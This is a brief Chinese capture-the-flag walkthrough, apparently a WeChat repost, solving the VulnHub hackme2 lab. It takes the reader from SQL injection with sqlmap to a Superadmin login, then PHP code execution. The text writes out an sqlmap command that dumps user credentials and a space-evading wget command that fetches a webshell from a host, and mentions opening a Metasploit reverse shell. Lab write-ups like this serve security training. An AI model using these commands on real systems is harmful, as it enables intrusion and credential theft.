靶场地址:https://download.vulnhub.com/hackme/hackme2-DHCP.ova
第一眼就看见了注册,那么这个靶场的思路可能就是注册后的操作,毕竟如果不是,开了这个也没什么用
注册一个用户,然后登陆,登陆成功,翻译了一下是个图书查询的系统
通过页面对比,猜测是个注入
跑了一下
sqlmap -r a.txt -vv --tamper=space2comment --dbms "MySQL" --level 5 -D webapphacking -C "user,pasword" –dump
结果
特殊的用户
Superadmin
解密后
进来了
超级管理员权限
进来的页面有两个点,一个是文件上传,一个是不知道干什么的表单提交,思考如下
制作者考的肯定不是上传点,很明显上传点会难一些,地下更不会放一个无用的表单,挂上XRAY,对功能进行打点,找出容易攻击到的点
Xray扫描入下
可以执行PHP代码
尝试复现
命令执行成功
Wge 下载webshell wget${IFS}http://0.0.0.0//a.php
${IFS}是代替空格的占位符,上线
上传脚本到
发现了一个特殊文件
切换到交互式,还需要往外弹一下
卡壳
最终解决,上传冰蝎马反弹msf 唉,不知道这个靶子为什么nc 用不了
本文始发于微信公众号(渗透云笔记):hackDHCP靶场教程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论